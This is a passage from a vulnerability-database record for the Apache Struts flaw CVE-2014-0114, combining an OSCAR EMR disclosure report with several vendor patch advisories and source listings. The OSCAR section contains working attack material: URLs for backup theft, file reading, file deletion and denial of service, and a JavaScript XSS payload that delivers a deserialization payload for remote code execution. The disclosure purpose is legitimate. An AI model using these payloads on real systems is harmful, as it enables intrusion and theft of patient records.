achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named \u0027oscarSecurityManager\u0027 is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i \u003c binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display\u0026doc_no=X\u0026providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. \n\nReferences:\n\nCVE-2014-0114 (SSRT101662)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nSiteScope Affected version\n Resolution patch details\n Link to download\n\n11.1x\n SiteScope 11.13 Windows 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00315\n\n SiteScope 11.13 Windows 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00316\n\n SiteScope 11.13 Linux 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00317\n\n SiteScope 11.13 Linux 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00318\n\n SiteScope 11.13 Solaris 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00319\n\n SiteScope 11.13 Solaris 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00320\n\n11.2x\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00321\n\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00322\n\n SiteScope 11.24.271 Intermediate Patch for Linux\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00323\n\n SiteScope 11.24.271 Intermediate Patch for Solaris\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00324\n\nHISTORY\nVersion:1 (rev.1) - 12 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat A-MQ Broker 7.5 release and security update\nAdvisory ID: RHSA-2019:2995-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2995\nIssue date: 2019-10-10\nKeywords: amq,messaging,integration,broker\nCross references: RHEA-2019:45713-01\nCVE Names: CVE-2014-0114\n====================================================================\n1. Summary:\n\nRed Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red\nHat A-MQ Broker 7.4.1, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-0114\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0\nhttps://access.redhat.com/documentation/en-us/red_hat_amq/7.5/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7\ngh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso\nQlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ\nqWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m\nGLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm\nYcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv\nSTakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7\nmPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts\nUYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No\nRuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG\nlRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm\n9D+Pu+r8KbU=kdcn\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n - CVE-2015-5652 - Python, elevation of privilege\n - CVE-2013-6429 - Spring Framework, cross-site request forgery\n - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP SiteScope Monitors Software Series 11.2xa11.32IP1\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2013-6429\n 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0050\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0107\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0114\n 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-3253\n 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-5652\n 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-0763\n 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. \n\n **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be can found in the personal zone in \"my updates\" in\nHPE Software Support Online: \u003chttps://softwaresupport.hpe.com\u003e. \n\n\n * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251\u003e\n\n\n * Apache Struts: KM02553983 (CVE-2014-0114):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983\u003e\n\n\n * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990\u003e\n\n * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991\u003e\n\n * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992\u003e\n\n * Python: KM02553997 (CVE-2015-5652):\n\n *\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997\u003e\n\n * Spring Framework: KM02553998 (CVE-2013-6429):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998\u003e\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\nApache Struts project team can recommend a first mitigation that is\nrelatively simple to apply. It involves the introduction of a generic\nServlet filter, adding the possibility to blacklist unacceptable request\nparameters based on regular expressions. Please see the corresponding HP\nFortify blog entry [2] for detailed instructions. Based\non this information, the Apache Struts project team recommends to apply\nthe mitigation advice *immediately* for all Struts 1 based applications. \n\nStruts 1 has had its End-Of-Life announcement more than one year ago\n[3]. However, in a cross project effort the Struts team is looking for a\ncorrection or an improved mitigation path. Please stay tuned for further\ninformation regarding a solution. \n\nThis is a cross-list posting. If you have questions regarding this\nreport, please direct them to security@struts.apache.org only. \n\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\n[2]\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\n[3] http://struts.apache.org/struts1eol-announcement.html\n\n-- \nRen\\xe9 Gielen\nhttp://twitter.com/rgielen\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0114"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "PACKETSTORM",
"id": "149311"
},
{
"db": "PACKETSTORM",
"id": "126619"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "127868"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "128873"
},
{
"db": "PACKETSTORM",
"id": "139721"
},
{
"db": "PACKETSTORM",
"id": "126455"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41690",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-0114",
"trust": 3.0
},
{
"db": "BID",
"id": "67121",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "59118",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59480",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59246",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60177",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59479",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58710",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59718",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59430",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59464",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58851",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59228",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59704",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59014",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "57477",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59245",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58947",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60703",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/07/08/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/06/15/10",
"trust": 1.6
},
{
"db": "HITACHI",
"id": "HS14-018",
"trust": 0.9
},
{
"db": "HITACHI",
"id": "HS14-020",
"trust": 0.9
},
{
"db": "JUNIPER",
"id": "JSA10643",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVN30962312",
"trust": 0.9
},
{
"db": "CS-HELP",
"id": "SB2022072128",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1427",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1089",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3134",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2355",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.0544",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2293.2",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSMA-20-184-01",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149311",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126619",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126692",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149050",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "127868",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137980",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154792",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "128873",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139721",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126455",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "149311"
},
{
"db": "PACKETSTORM",
"id": "126619"
},
{
"db": "PACKETSTORM",
